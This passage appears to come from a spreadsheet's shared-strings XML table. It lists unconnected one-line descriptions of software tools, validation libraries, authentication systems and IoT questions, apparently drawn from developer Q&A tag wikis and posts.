    <t>LinkChecker is a free, GPL licensed website validator.</t>
  </si>
  <si>
    <t>The ASP.NET MVC 2 modelstate validation checks if a model is valid.</t>
  </si>
  <si>
    <t>This tag is for validation in zend framework.</t>
  </si>
  <si>
    <t>PowerShell Web Server is a Secure, flexible and lightweight web server.</t>
  </si>
  <si>
    <t>MailSystem provides full support for SMTP, POP3, IMAP4, NNTP, MIME, S/MIME, OpenPGP, DNS, vCard, vCalendar, Anti-Spam (Bayesian , RBL, DomainKeys), Queueing, Mail Merge and WhoIs.</t>
  </si>
  <si>
    <t>It is a security system that provides access control and auditing functionality for the z/OS and z/VM operating systems.</t>
  </si>
  <si>
    <t>XSD validations are used to validate the XML file against the stored schema.</t>
  </si>
  <si>
    <t>Validar is an add-in for Foddy providing validation for XAML binding models.</t>
  </si>
  <si>
    <t>Authenticate an extensible authentication plugin for Play!</t>
  </si>
  <si>
    <t>Backand is a backend-as-a-service for AngularJS that provides social login, push notifications, and Ionic integration.</t>
  </si>
  <si>
    <t>Abide is the form validation library built into Zurb Foundation</t>
  </si>
  <si>
    <t>It has audits for performance, accessibility, progressive web apps, and more.</t>
  </si>
  <si>
    <t>Kohana 3 is a HMVC (Hierarchical Model-View-Controller) PHP framework that places security, scalability and rapid development at its forefront.</t>
  </si>
  <si>
    <t>Kin is a cryptocurrency used for value exchange in a decentralized ecosystem of digital applications.</t>
  </si>
  <si>
    <t>Parsley JS is a form and front-end validation library in JavaScript.</t>
  </si>
  <si>
    <t>Cookie Consent is a lightweight JavaScript plugin for alerting users about the use of cookies.</t>
  </si>
  <si>
    <t>It can also permit on-demand repository and branch creation, and allows delegating permissions administration to users.</t>
  </si>
  <si>
    <t>For other types of validation, please use the all-inclusive "validation" tag.</t>
  </si>
  <si>
    <t>For the unrelated email filtering language, see sieve-language.</t>
  </si>
  <si>
    <t>Below is a sample login form:
Forms are documented within section 17 of the HTML4.01 specification and section 4.10 of the HTML5 specification.</t>
  </si>
  <si>
    <t>Django provides full support for anonymous sessions.</t>
  </si>
  <si>
    <t>Optional if the table/view is in the default database for username.</t>
  </si>
  <si>
    <t>Google supports the OpenID 2.0 protocol, providing authentication support as an OpenID provider.</t>
  </si>
  <si>
    <t>Security
  professionals also rely on Ncrack when auditing their clients.</t>
  </si>
  <si>
    <t>The Zend_Validate component provides a set of commonly needed validators.</t>
  </si>
  <si>
    <t>The extension uses XBL and CSS to prevent elements of Silverlight, Macromedia Authorware, Adobe Director and Adobe Flash from being displayed.</t>
  </si>
  <si>
    <t>SchemaCrawler has a good mix useful features for data governance.</t>
  </si>
  <si>
    <t>Widevine also maintains a license server which allow clients to access in order to get the license.</t>
  </si>
  <si>
    <t>LastPass Password Manager also has a form filler that automates password entering and form filling.</t>
  </si>
  <si>
    <t>Additionally, parameterized queries are an important safeguard against SQL injection.</t>
  </si>
  <si>
    <t>Released in 2008, it was developed to be the language Hacker News is written in.</t>
  </si>
  <si>
    <t>It is designed to be as easy as possible to use and it is one of the safest frameworks.</t>
  </si>
  <si>
    <t>In addition, LoginRadius provides APIs and SDKs that can integrate into any tech stack.</t>
  </si>
  <si>
    <t>Morse code is no longer a license requirement for Amateur radio.</t>
  </si>
  <si>
    <t>UCD also provides governance, visibility, and consistency across all deployments.</t>
  </si>
  <si>
    <t>And although IE&lt;=8 is not supported, this plugin is future-proof.</t>
  </si>
  <si>
    <t>OS X El Capitan is an update that focuses mainly on performance, stability, and security.</t>
  </si>
  <si>
    <t>XML without validation is also supported by the library.</t>
  </si>
  <si>
    <t>Referential integrity is enforced via cascading updates and deletes.</t>
  </si>
  <si>
    <t>The structural constraints and permissions in the database determine the API endpoints and operations.</t>
  </si>
  <si>
    <t>Functionalities :
Easy Manage for your permissions &amp; roles.</t>
  </si>
  <si>
    <t>Standard Ring security model: auth as you like, HTTPS when available, CSRF support, etc.</t>
  </si>
  <si>
    <t>From http://ranger.apache.org:
Apache Ranger is a framework to enable, monitor and manage comprehensive data security across the Hadoop platform.</t>
  </si>
  <si>
    <t>Centralize auditing of user access and administrative actions (security related) within all the components of Hadoop.</t>
  </si>
  <si>
    <t>Features
NiftyNet currently supports medical image segmentation and generative adversarial networks.</t>
  </si>
  <si>
    <t>In addition it has a 2D bar code for additional identification.</t>
  </si>
  <si>
    <t>It allows for easier integration with security solutions as well as connects to business context from other Microsoft Graph entities.</t>
  </si>
  <si>
    <t>It allows for easier integration with security solutions as well as connects to the business context from other Microsoft Graph entities.</t>
  </si>
  <si>
    <t>OmniAuth is a flexible authentication system for Ruby applications utilizing Rack middleware, such as Rails applications.</t>
  </si>
  <si>
    <t>Internally uses validator.js to perform validation.</t>
  </si>
  <si>
    <t>Integrated capabilities for encrypting the configuration of applications (i.e.</t>
  </si>
  <si>
    <t>The keys are used for a variety of purposes, including authentication and data integrity.</t>
  </si>
  <si>
    <t>automatic escaping of embedded
quote chars)</t>
  </si>
  <si>
    <t>0x89740016: Exception from HRESULT:
  0x89740016
If I change Auth Mode to none, I get error:
Unable to connect to the Microsoft Visual Studio Remote Debugger named 'minwinpc'.</t>
  </si>
  <si>
    <t>A license key is a type of software protection and can take many forms.</t>
  </si>
  <si>
    <t>Kaleido, the Blockchain Business Cloud, is an all-in-one enterprise SaaS that radically simplifies the creation and operation of private blockchain networks.</t>
  </si>
  <si>
    <t>You can protect against this with Apache authorization, or you can design your own access model using LDAP, .htaccess files, etc.</t>
  </si>
  <si>
    <t>SUA includes Interix to provide extended POSIX compliance for creating applications.</t>
  </si>
  <si>
    <t>Data Integration
Gain pervasive, continuous access to trusted data with high performance and low TCO.</t>
  </si>
  <si>
    <t>Basic validation failure message functionality is implemented in Zend_Validate_Abstract.</t>
  </si>
  <si>
    <t>It applies rules or constraints to check for correctness, meaningfulness, and security of data that are input to the system.</t>
  </si>
  <si>
    <t>SVN client is a sofware implementing the client role specified in the clientserver model of the Subversion revision control system.</t>
  </si>
  <si>
    <t>A flexible user management module that handles common tasks such as registrations, authentication and password retrieval.</t>
  </si>
  <si>
    <t>Implements deep integration with ATK Data: type mapping, REST operations and authentication.</t>
  </si>
  <si>
    <t>/Robustness, the forgotten code quality/
Several links by theme:
Examples for Robustness Requirements
10 characteristics of a robust application or service</t>
  </si>
  <si>
    <t>Protocol gateway uses pipeline-based message processing using the following handlers: TLS encryption/decryption, MQTT codec (encoder and decoder), and MqttIotHubAdapter.</t>
  </si>
  <si>
    <t>), easy management of common resources using extensions..
By default, an
applet-like security sand-box is applied to code launched using JWS.</t>
  </si>
  <si>
    <t>It is possible to interface with the cluster through a Proxy Service by connecting using a TCP/IP
Useful books
Oracle Coherence 3.5  by Aleksandar Seovic
Links
Oracle Website with documentation and downloads</t>
  </si>
  <si>
    <t>If this happens after the ClientHello message is sent, this most likely means that the client is not broadcasting support for a cipher suite or extension that the server requires.</t>
  </si>
  <si>
    <t>Amazon WorkMail is a secure, managed business email and calendar service with a web client and limited support for existing desktop and mobile email client applications.</t>
  </si>
  <si>
    <t>This can be limited to private usage only, so if you want to use it and generate business/ money, it is forbidden or you have to buy a license.</t>
  </si>
  <si>
    <t>OTT is very complex discipline, which includes video metadata servers, CDN, CRM system, ingest/encoding DRM, billing, payment gateways, client devices applications and many other related issues like legal and contractual isses with film studios.</t>
  </si>
  <si>
    <t>BLENC is an extension which hooks into the Zend Engine, allowing for transparent encryption and execution of PHP scripts using the blowfish algorithm.</t>
  </si>
  <si>
    <t>The standard platform includes the Ames encrypted P2P network (including addressing and PKI), the Arvo operating system, and the Hoon language, on top of the core Nock combinator interpreter.</t>
  </si>
  <si>
    <t>Tendermint Core is Byzantine Fault Tolerant (BFT) middleware that takes a state transition machine - written in any programming language - and securely replicates it on many machines.</t>
  </si>
  <si>
    <t>References
SPARQL 1.1 Federated Query
Creating and Querying Federated Data Sources
SAML-based Federated SSO
Federated Trust Policy Enforcement by Delegated SAML Assertion Pruning (pdf)</t>
  </si>
  <si>
    <t>NSURLCredential is an immutable object representing an authentication credential consisting of authentication information specific to the type of credential and the type of persistent storage to use, if any.</t>
  </si>
  <si>
    <t>Amazon Glacier is an online storage service intended to provide durable and secure long-term storage for the purposes of archiving and backup of large amounts of data.</t>
  </si>
  <si>
    <t>It's a Facebook library for Ruby, supporting the Graph API (including the batch requests and photo uploads), the REST API, realtime updates, test users, and OAuth validation.</t>
  </si>
  <si>
    <t>and install it as follows,
You can then connect to your database as follows,
#!/usr/bin/python
import MySQLdb
# Open database connection
db = MySQLdb.connect("localhost","userName","userPassword","databaseName" )
Once you are connected to database, you can add, update, delete data into your table.</t>
  </si>
  <si>
    <t>JDBCRealm is implementation of realm (a collection of usernames and passwords that identify valid users of a web application, plus an enumeration of the list of roles associated with each valid user) that works with JDBC supported databases.</t>
  </si>
  <si>
    <t>Scoreloop SDK  freemium model allow end-users to build an identity that persists across games with a rich set of Social features, Monetization methods, and Distribution channels.</t>
  </si>
  <si>
    <t>SHOW ENGINE INNODB STATUS statement output includes information about the most recent foreign key error if a CREATE TABLE statement for an InnoDB table fails.</t>
  </si>
  <si>
    <t>This module does not support the full suite of OpenSSL functions, but does offer access to actively maintained encryption libraries as opposed to deprecated libraries like mcrypt.</t>
  </si>
  <si>
    <t>Crash reports can be sent automatically or with user interaction, add custom meta data or log files, and inspect the SDK's code for further customization and security audits.</t>
  </si>
  <si>
    <t>For example:
Data type validation;
Range and constraint validation;
Code and Cross-reference validation; and
Structured validation
Resources:
http://en.wikipedia.org/wiki/Data_validation</t>
  </si>
  <si>
    <t>Available in http://www.cryptopp.com/, the Crypto++ Library as a whole is licensed under Boost
Software License 1.0, while individual file are placed under a Public Domain license (http://www.cryptopp.com/License.txt).</t>
  </si>
  <si>
    <t>There are several areas where this set of trade offs would be appropriate where traditionally other embedded databases such as Berkeley DB and GDBM have been used, but the added robustness and true guaranteed ACID transaction updates or the maximal speed when reading the database are needed.</t>
  </si>
  <si>
    <t>It supports HTTP response stubbing, request verification, proxy/intercept, record/playback of stubs and fault injection, and can be used from within a unit test or deployed into a test environment.</t>
  </si>
  <si>
    <t>JXLoginPane is a Swing based component available in SwingX library as part of a login/authentication framework.</t>
  </si>
  <si>
    <t>And also extensions to audit different systems such as EntityFramework, MVC, WebAPI, SignalR and WCF.</t>
  </si>
  <si>
    <t>You need persistent storage, locking etc.</t>
  </si>
  <si>
    <t>Features include hotkeys, keywords and file actions.</t>
  </si>
  <si>
    <t>PRTG is an extensible network monitoring product from Paessler AG.</t>
  </si>
  <si>
    <t>I will include it down below in addition to the code for the edge detection.</t>
  </si>
  <si>
    <t>That means that the Arduino side has to use standard cookies once the login secret from the PHP server has been validated.</t>
  </si>
  <si>
    <t>You provide a full URI to the  field:
You should not include protocol and host name.</t>
  </si>
  <si>
    <t>Hamcrest for Objective-C: Powerful, combinable, extensible matchers for verification</t>
  </si>
  <si>
    <t>A hashing function within the Microsoft Transact-SQL Database Engine.</t>
  </si>
  <si>
    <t>It is a core component of most the security protocols used on the Internet, including the SSL/TLS protocol suite.</t>
  </si>
  <si>
    <t>The major fix is in the password protection update to support in new versions of MS Excel</t>
  </si>
  <si>
    <t>Security Assertion Markup Language (SAML) is a standard for logging users into applications based on their sessions in another context.</t>
  </si>
  <si>
    <t>RSA Security has never officially released the algorithm; Rivest has, however, linked to the English Wikipedia article on RC4 in his own course notes.</t>
  </si>
  <si>
    <t>Merge, Encrypt, Split, Repair and Decrypt PDF files.</t>
  </si>
  <si>
    <t>Supported account types include Twitter, Facebook, Sina Weibo, Tencent Weibo, and LinkedIn.</t>
  </si>
  <si>
    <t>The project is currently referred to as Open Mobile Alliance Data Synchronization and Device Management.</t>
  </si>
  <si>
    <t>CASL simplifies permission management in your application and can be effectively used on UI and API side as well.</t>
  </si>
  <si>
    <t>This sort of activity may be very familiar to CVS and (to a lesser extent) Subversion users.</t>
  </si>
  <si>
    <t>The first form (a login form) loads perfectly fine.</t>
  </si>
  <si>
    <t>Unison doesn't over such a feature) + the pass-phrase could be obtained by simple manipulations.</t>
  </si>
  <si>
    <t>according to ssl labs test, my server does support tls 1.2, 1.1 and various outdated (even RC4) cipher suites.</t>
  </si>
  <si>
    <t>I have a Raspberry Pi which I want to use to make automatic backups of my Wordpress instance.</t>
  </si>
  <si>
    <t>I am using this facility to specify custom credentials while binding WIoTP service to an app in Bluemix.</t>
  </si>
  <si>
    <t>As you know, embedded devices sometimes do not have the capability to secure a connection via certificates (former SSL).</t>
  </si>
  <si>
    <t>I have also made the database rules as public in firebase.</t>
  </si>
  <si>
    <t>The plugin AndroidManifest file in the bluetooth plugin already includes the suggested permission line.</t>
  </si>
  <si>
    <t>I also know Windows 10 IoT dashboard API "/api/resourcemanager/systemperf", it return System statistics which include CPU Usage in Percentage but credentials are required to access it, so I don't want to use it.</t>
  </si>
  <si>
    <t>I'm trying to get to root cause, normally I would run "adb logcat" to view full details with android.</t>
  </si>
  <si>
    <t>I want to install SDK for Automatic License Plate Recognition on Raspberry Pi 3.</t>
  </si>
  <si>
    <t>N: See apt-secure(8) manpage for repository creation and user configuration details.</t>
  </si>
  <si>
    <t>EDIT:
The PRNG approach may not be the best choice for cryptographic key generation.</t>
  </si>
  <si>
    <t>The trusted build from index.docker.io might support this feature in the future.</t>
  </si>
  <si>
    <t>Or in other words, you can fake it, but an ethernet capability would
  probably be better &amp; easier.</t>
  </si>
  <si>
    <t>You can use the WindowsIotCoreWatcher application to get the IP address of your IOT device if Visual Studio does not detect it automatically.</t>
  </si>
  <si>
    <t>For a full class C network the netmask must be provided in form of a /24 at the end of the IP address.</t>
  </si>
  <si>
    <t>The easiest way is to simply run the program under  so that you will have full root permissions.</t>
  </si>
  <si>
    <t>The truth is Google IOT doesn't have per device alerting, but instead offers only alerting on an entire device registry.</t>
  </si>
  <si>
    <t>aws iot test-invoke-authorizer exercise same constraints to help debug actual custom authorization calls.</t>
  </si>
  <si>
    <t>Update: AWS Iot DeviceGateway now supports greater than 1024 chars custom auth token.</t>
  </si>
  <si>
    <t>It may work for some protocols as the support is being built out but nothing has been validated at this time.</t>
  </si>
  <si>
    <t>I'm still working with MSFT support on the CA certificate signing issues, but this one is a side effect.</t>
  </si>
  <si>
    <t>In extensive use of ES6 (and its predecessors) on Raspberry Pi, I have not found anything to work differently from Intel, despite their statement that they don't support anything other than Intel.</t>
  </si>
  <si>
    <t>An ActiveRecord callback that is executed after validating an object but before writing it to the database.</t>
  </si>
  <si>
    <t>The UPN (User Principal Name) is an Internet-style login name for the user based on the Internet standard RFC 822.</t>
  </si>
  <si>
    <t>It focuses mainly on security, user experience, performance and feature set.</t>
  </si>
  <si>
    <t>Acts as a centralized Secure Signature Creation Device (SSCD).</t>
  </si>
  <si>
    <t>jquery.inputmask is a jquery plugin which create an input mask.</t>
  </si>
  <si>
    <t>Redis is an open source, BSD licensed, advanced key-value store.</t>
  </si>
  <si>
    <t>Nette focuses on security and performance and it's one of the safest PHP frameworks.</t>
  </si>
  <si>
    <t>Custom menu items appear in the menu after any validated system items.</t>
  </si>
  <si>
    <t>referential is referring to the referential integrity concept of relationel databases.</t>
  </si>
  <si>
    <t>FILTER_VALIDATE_EMAIL is a PHP validation filter used to validate email addresses.</t>
  </si>
  <si>
    <t>Defining and scheduling SQL scripts on demand is easy and secure with RoverGo.</t>
  </si>
  <si>
    <t>Issues regarding NoSQL database injection attacks</t>
  </si>
  <si>
    <t>ChroPath is used to generate &amp; validate unique selectors like relative xpath in devtools panel itself.</t>
  </si>
  <si>
    <t>A toolkit which provides a set of native Angular (Not AngularJS 1.x) components, themeable components, authentication and security layers.</t>
  </si>
  <si>
    <t>PDF can contain interactive forms that allow users to enter information to be stored in the PDF.</t>
  </si>
  <si>
    <t>rman or Recovery Manager is a CLI tool for performing backups and recoveries on an Oracle Database.</t>
  </si>
  <si>
    <t>The Fakes framework grew out of the Pex and Moles projects released by Microsoft Research.</t>
  </si>
  <si>
    <t>SSDT platform validation capability ensures that your scripts will work on the target you specify.</t>
  </si>
  <si>
    <t>It is the only 3rd party technology to have this level of integration and validation.</t>
  </si>
  <si>
    <t>Optional if username or the database owner is the owner of the table.</t>
  </si>
  <si>
    <t>You can use the License Manager API to assign, update, retrieve, and delete user licenses.</t>
  </si>
  <si>
    <t>The library integrates with Django's builtin authentication system, so most applications require minimal changes to support OpenID login.</t>
  </si>
  <si>
    <t>Doorkeeper is a gem that makes it easy to introduce OAuth 2 provider functionality to Rails application.</t>
  </si>
  <si>
    <t>At logon time, a UPN is validated first by searching the local domain, then the global catalog.</t>
  </si>
  <si>
    <t>Version 4.1 was released in December 2013, introducing new network topologies and privacy features.</t>
  </si>
  <si>
    <t>Worklight defines a framework that consists of:
Server-side security tests.</t>
  </si>
  <si>
    <t>esqueleto is a bare bones, type-safe EDSL for SQL queries that works with unmodified persistent SQL backends.</t>
  </si>
  <si>
    <t>The specification currently supports public key and password authentication and a full implementation of the SFTP protocol.</t>
  </si>
  <si>
    <t>Yowsup allows you to login and use the WhatsApp service and provides you with all capabilities of an official WhatsApp client, allowing you to create a full-fledged custom WhatsApp client.</t>
  </si>
  <si>
    <t>Packet capture is the interception of these packets as they are moved over a network of some type.</t>
  </si>
  <si>
    <t>Technical Features
Advanced User Agent detection (multiple methods i.e Scientia, AMDD, or remote device database in Mobile Joomla!</t>
  </si>
  <si>
    <t>Action system for easy manipulation of actors over time.</t>
  </si>
  <si>
    <t>We also provide full walkthroughs for authentication flows such as OAuth2, OpenID Connect, Graph API, and other awesome features.</t>
  </si>
  <si>
    <t>AeroGear provides Two-Factor Authentication and One-Time-Password features to improve your application's security.</t>
  </si>
  <si>
    <t>The following are some of the important language features of Hack.</t>
  </si>
  <si>
    <t>With IIS, you get choice and control without giving up reliability or security.</t>
  </si>
  <si>
    <t>Entity Framework Extended is provided as a NuGet package.</t>
  </si>
  <si>
    <t>For customers with current support contracts, Intel Premier Support is available.</t>
  </si>
  <si>
    <t>jCryption is a jQuery plugin for encrypting form data in JavaScript using RSA, AES &amp; OpenSSL protocols.</t>
  </si>
  <si>
    <t>If you have inquiries of a confidential nature, you can reach Kloudless Support by emailing support@kloudless.com.</t>
  </si>
  <si>
    <t>WebView updates bringing security and stability enhancements, as well as bug fixes.</t>
  </si>
  <si>
    <t>Graylog is an integrated log capture and analysis solution for operational intelligence.</t>
  </si>
  <si>
    <t>ParseUI aims at streamlining pfuser authentication and display of pfobject lists for new screen resolutions.</t>
  </si>
  <si>
    <t>Rich collection of matchers to verify expected states.</t>
  </si>
  <si>
    <t>Because capturing content outside of the current application has security implications, applications wishing to use these features must get permission from the user first.</t>
  </si>
  <si>
    <t>Compliant with FIDO, supported by Google and many other software vendors who need strong authentication.</t>
  </si>
  <si>
    <t>This plugin itself do not provide JSR-303 Specific validationn but will use underlying validator to perform bean validation.</t>
  </si>
  <si>
    <t>RESTHeart can be extended with custom security implementations, request transformers, checkers and hooks.</t>
  </si>
  <si>
    <t>Typically, but not necessarily, referential integrity is a one-to-many relationship.</t>
  </si>
  <si>
    <t>By customizing the rules to your application, many attacks can be identified and blocked.</t>
  </si>
  <si>
    <t>It supports XPath and CSS selectors, User Agent spoofing, and optional headless-browser support to execute JavaScript scripts on the page.</t>
  </si>
  <si>
    <t>Authentication often involves verifying the validity of at least one form of identification.</t>
  </si>
  <si>
    <t>Tweepy supports OAuth authentication, as BasicAuth is no longer supported by the Twitter API.</t>
  </si>
  <si>
    <t>This means you can use the common logic operators to build up a validation schema.</t>
  </si>
  <si>
    <t>class-validator
class-validator is an open-source TypeScript library for validation using TypeScript decorators.</t>
  </si>
  <si>
    <t>These metadata documents can be on a durable storage, or be retrieved online.</t>
  </si>
  <si>
    <t>SIDs are useful for troubleshooting issues with security audits, Windows server and domain migrations.</t>
  </si>
  <si>
    <t>CSS validator checks whether your CSS styles to satisfy the requirements the specification.</t>
  </si>
  <si>
    <t>I am trying to get the exact feature vector to save each fingerprint values in to the database.</t>
  </si>
  <si>
    <t>The .NET `CustomValidator` class that allows custom validation of any UI input element</t>
  </si>
  <si>
    <t>Questions about validate.js, a JavaScript library containing several useful functions for validating Objects.</t>
  </si>
  <si>
    <t>Declarative security is a syntax that uses attributes to place security information into the metadata of the code.</t>
  </si>
  <si>
    <t>SystemVerilog is a unified hardware description language (hdl) and verification language.</t>
  </si>
  <si>
    <t>Identification of client capabilities usually cannot be done via the user-agent, but must be obtained by looking up the user-agent in a database.</t>
  </si>
  <si>
    <t>High Performance Enabled SSH/SCP supports NONE Cipher switching.</t>
  </si>
  <si>
    <t>The System.Security.Principal.IPrincipal interface defines the basic functionality of a security object.</t>
  </si>
  <si>
    <t>(I've heard mono doesn't work for the pi)
Is there a simple way to accomplish this without signalR which would still easily implement the security features already built into it?</t>
  </si>
  <si>
    <t>I am planning to implement iot hub device management feature to reboot and firmware update on our device.</t>
  </si>
  <si>
    <t>Ad-Hoc is even less complicated (assuming you know how to make a webserver and are going to make it secure enough, and have a dongle which supports adhoc):
Here is a post about ad-hoc networking with a raspberry pi.</t>
  </si>
  <si>
    <t>A flexible user management module that handles common tasks such as registration, authentication and password retrieval.</t>
  </si>
  <si>
    <t>Storing configuration in the environment separate from code is based on The Twelve-Factor App methodology.</t>
  </si>
  <si>
    <t>On android rooted devices are popular to allow additional things to be achieved, such as accessing all files for backup purposes.</t>
  </si>
  <si>
    <t>Concurrency and Multicore Support
Task affinities and dispatching domains allow tasks to be mapped to specific CPUs or cores.</t>
  </si>
  <si>
    <t>It provides basic obfuscation features that help secure secrets in a .NET assembly.</t>
  </si>
  <si>
    <t>Factors and identity
The ways in which someone may be authenticated fall into three categories, based on what are known as the factors of authentication: something the user knows, something the user has, and something the user is.</t>
  </si>
  <si>
    <t>It has the same feature set as existing workflows while operating faster, more securely, and more reliably.</t>
  </si>
  <si>
    <t>Common names for web bugs implemented through an embedded image include tracking pixel, pixel tag, 11 gif, and clear gif.</t>
  </si>
  <si>
    <t>Database - authenticate users with traditional username and password credentials stored on an Auth0 hosted database or your own existing database.</t>
  </si>
  <si>
    <t>Protected Attributes
If you're lazy like me, you'll be grabbing the data from the form and throwing it straight into the model.</t>
  </si>
  <si>
    <t>COM add-ins and VSTO add-ins (VSTO Add-ins base on and extend the COM IDTExensibility2 interface) must be registered under Windows.</t>
  </si>
  <si>
    <t>It uses the League OAuth2 Server package as a dependency but provides a simple, easy-to-learn and easy-to-implement syntax.</t>
  </si>
  <si>
    <t>For various reasons this embedded system is being upgraded to run with Windows 10 IoT Enterprise, which offers the much more feature-laden UWF for protecting the system.</t>
  </si>
  <si>
    <t>I have computers on which permanent file system changes/mass storage devices are not permitted and I have repetitive tasks that benefit from shell scripting.</t>
  </si>
  <si>
    <t>Use known, existing repository
If you want to have authorization dialogue every time, not once per client, read about store-auth-creds in subversion config</t>
  </si>
  <si>
    <t>Form submission is the operation for which the data user input are going to be processed by a form submission handler implemented by a Drupal module.</t>
  </si>
  <si>
    <t>Libcrafter is a high level library for C++ designed to make easier the creation and decoding of network packets.</t>
  </si>
  <si>
    <t>As a Java based security solution, it is mostly applicable for the Java-based web applications that are built upon Spring Security framework.</t>
  </si>
  <si>
    <t>The Open Mobile API is a standardized, open and cross-language programming interface for access to different types secure elements (e.g.</t>
  </si>
  <si>
    <t>The SDK allows wallet providers the flexibility to enhance, add, and customize payment solutions for many use cases.</t>
  </si>
  <si>
    <t>I have 2 options: hope that the creator of the webSocket Server can provide a version with the older protocol implementation, or update to the IOS 6 beta 3 in which there is (according to caniuse.com) full websocket support (read: they implemented the correct protocol in safari mobile, only now...).</t>
  </si>
  <si>
    <t>Part of Microsoft's .NET Framework that provides a base class for supplying credentials for password based authentication schemes such as basic, digest, NTLM or Kerberos.</t>
  </si>
  <si>
    <t>Spread can be used in many distributed applications that require high reliability, high performance, and robust communication among various subsets of members.</t>
  </si>
  <si>
    <t>MSFT defines azure capable legacy devices with the following characteristics 
Legacy devices may not have a certificate, TPM, or any other security feature that can be used to securely identify the device.</t>
  </si>
  <si>
    <t>IoTHub service does
  not support HTTP/2 protocol yet but due to the bug, we do return
  HTTP/2 as a supported protocol in ALPN extension during initial
  handshake.</t>
  </si>
  <si>
    <t>The capability of Ethernet has matured to the point where it is used for both basic desktop computer networking and for carrier-grade networks where operators must guarantee quality of service.</t>
  </si>
  <si>
    <t>angular-ui-slider
Requirements: JQuery, JQueryUI
ng-intl-tel-input
An AngularJS directive for International Telephone Input
angular-bind-html-compile
Directive that calls $compile on trusted HTML, allowing directives in an API response.</t>
  </si>
  <si>
    <t>JFrog Bintray is a universal distribution hub, which provides features like a global distribution network (CDN), extreme throughput and redundancy for downloads, permission control for external users (entitlements), product and EULA support etc.</t>
  </si>
  <si>
    <t>Requirements
PHP 5.2.1 or higher
PHP JSON extension
Note: some features (service accounts and id token verification) require PHP 5.3.0 and above due to cryptographic algorithm requirements.</t>
  </si>
  <si>
    <t>Its modular construction enables application developers to plug in alternative implementations of key functions such as crypto suites, the state persistence store, and logging utility.</t>
  </si>
  <si>
    <t>Intended for use in single or multi-camera video security applications, including commercial or home CCTV, theft prevention and child, family member or home monitoring and other domestic care scenarios such as nanny cam installations.</t>
  </si>
  <si>
    <t>Typically, middleware will facilitate application development by providing services such as communications, file access, or thread locking that have a common Application Programming Interface (API) across multiple operating systems.</t>
  </si>
  <si>
    <t>The [L4Re](https://l4re.org/) Runtime Environment is an operating system framework for building systems with real-time, security, safety and virtualization requirements.</t>
  </si>
  <si>
    <t>For high performance it holds all its data in memory, writing checkpoints and transaction logs to disk for recovery.</t>
  </si>
  <si>
    <t>Spring Boot Actuator
This project, when added, will enable certain enterprise features (Security, Metrics, Default Error pages) to your application.</t>
  </si>
  <si>
    <t>SQLite actually advises against using databases on shared network filesystems:
SQLite uses POSIX advisory locks to implement locking on Unix.</t>
  </si>
  <si>
    <t>ITIM provides the administrator with automated routines to retrieve accounts from multiple systems and enforce various policies across the enterprise.</t>
  </si>
  <si>
    <t>The last Presto-based version of Opera is Opera 12, which has only seen security-related minor releases since Opera's main development switched to Blink.</t>
  </si>
  <si>
    <t>You can easily add an additional security feature to reduce the amount of attempts per time.</t>
  </si>
  <si>
    <t>The Google APIs Console is a web interface for managing and viewing traffic data, authentication, and billing information for the Google APIs that are used by a project.</t>
  </si>
  <si>
    <t>OTPauth is an open-source library for PHP code implementing a two-factor authentication system which is based on RFC 2289 ("The One-Time Password").</t>
  </si>
  <si>
    <t>Returns NULL if the key is not open, if the key does not exist, or if the key is a deprecated RC4 key and the database is not in compatibility level 110 or higher.</t>
  </si>
  <si>
    <t>You didn't say if you need any form of security, but some basic security features are provided (no built-in encryption or communication over TLS yet, sorry).</t>
  </si>
  <si>
    <t>I was under assumption that, custom policy with additional privileges will be injected to the STS credentials.</t>
  </si>
  <si>
    <t>Custom Action Filters can be used for logging, authentication, output caching, or other tasks.</t>
  </si>
  <si>
    <t>Meteor includes built in support for logging in using password, Facebook, Twitter and a few other OAuth providers, as well as a basic UI.</t>
  </si>
  <si>
    <t>Administrators may have varying levels of access to metadata and this product will enforce security restrictions.</t>
  </si>
  <si>
    <t>DQS also provides you with profiling that is integrated into its data-quality tasks, enabling you to analyze the integrity of your data.</t>
  </si>
  <si>
    <t>The reason is more interesting however:
IOTHUB_CLIENT_CONNECTION_EXPIRED_SAS_TOKEN
IOTHUB_CLIENT_CONNECTION_DEVICE_DISABLED
IOTHUB_CLIENT_CONNECTION_BAD_CREDENTIAL
IOTHUB_CLIENT_CONNECTION_RETRY_EXPIRED
IOTHUB_CLIENT_CONNECTION_NO_NETWORK
IOTHUB_CLIENT_CONNECTION_COMMUNICATION_ERROR
IOTHUB_CLIENT_CONNECTION_OK
So my first question is: What are the semantics for the respective reasons?</t>
  </si>
  <si>
    <t>When I click on a button, it is not registered as a click unless I move the mouse before I release the left button.</t>
  </si>
  <si>
    <t>I want to add a checksum ( after the * ) so that I can validate the sentence on the other side which receives it.</t>
  </si>
  <si>
    <t>The main requirement is that is it decentralized
I therefore thought that Bluetooth mesh would be the best solution.</t>
  </si>
  <si>
    <t>The network protections can also be implemented by a dedicated device that does the heavily lifting and disqualifies much rogue traffic before it reaches the Arduino.</t>
  </si>
  <si>
    <t>You are also vulnerable to a SQL injection by $_GET["value"] directly into your SQL query string.</t>
  </si>
  <si>
    <t>In all honesty, I'd leave them there just to be on the safe side, also to make your code easier to understand.</t>
  </si>
  <si>
    <t>ZRS accounts do not have
  metrics or logging capability enabled at this time.</t>
  </si>
  <si>
    <t>- You need to increase the security level when connecting to the device
On a side note, I have just added DBus support to gattlib.</t>
  </si>
  <si>
    <t>If the Arduino is in unlock mode, provide visual/audio feedback, and wait for a new passcode.</t>
  </si>
  <si>
    <t>Also it empowers a client to choose the QoS level depending on its network reliability and application logic.</t>
  </si>
  <si>
    <t>You will need to use RMB/Permissions/Advanced to change its owner to Administrators or your own username and then give said user Full Control.</t>
  </si>
  <si>
    <t>Sensors not marked as PC-integrated, even if they are of a supported
  type, will not be accessible.</t>
  </si>
  <si>
    <t>This analysis does not count any additional overhead for metadata such as validity bits, or flags to indicate which element is the newest, etc.</t>
  </si>
  <si>
    <t>An XML Document Type Declaration(DTD) is a text file which lists the element and attribute mappings as well as hierarchy rules used to validate an XML dialect.</t>
  </si>
  <si>
    <t>gae-session is a fast, lightweight sessions middleware for Google App Engine (secure cookies, memcache, or datastore).</t>
  </si>
  <si>
    <t>Google supports common OAuth 2.0 scenarios such as those for web server, installed, and client-side applications.</t>
  </si>
  <si>
    <t>Shodan is a search engine that lets you find specific computers using a variety of filters</t>
  </si>
  <si>
    <t>It is a common mechanism that fits into the Rack Machinery to offer powerful options for authentication.</t>
  </si>
  <si>
    <t>FileProvider is an extension of Android's ContentProvder class, which supports easy sharing of private files between apps.</t>
  </si>
  <si>
    <t>synctool is a administration tool that keeps configuration files synchronized across all nodes in a cluster.</t>
  </si>
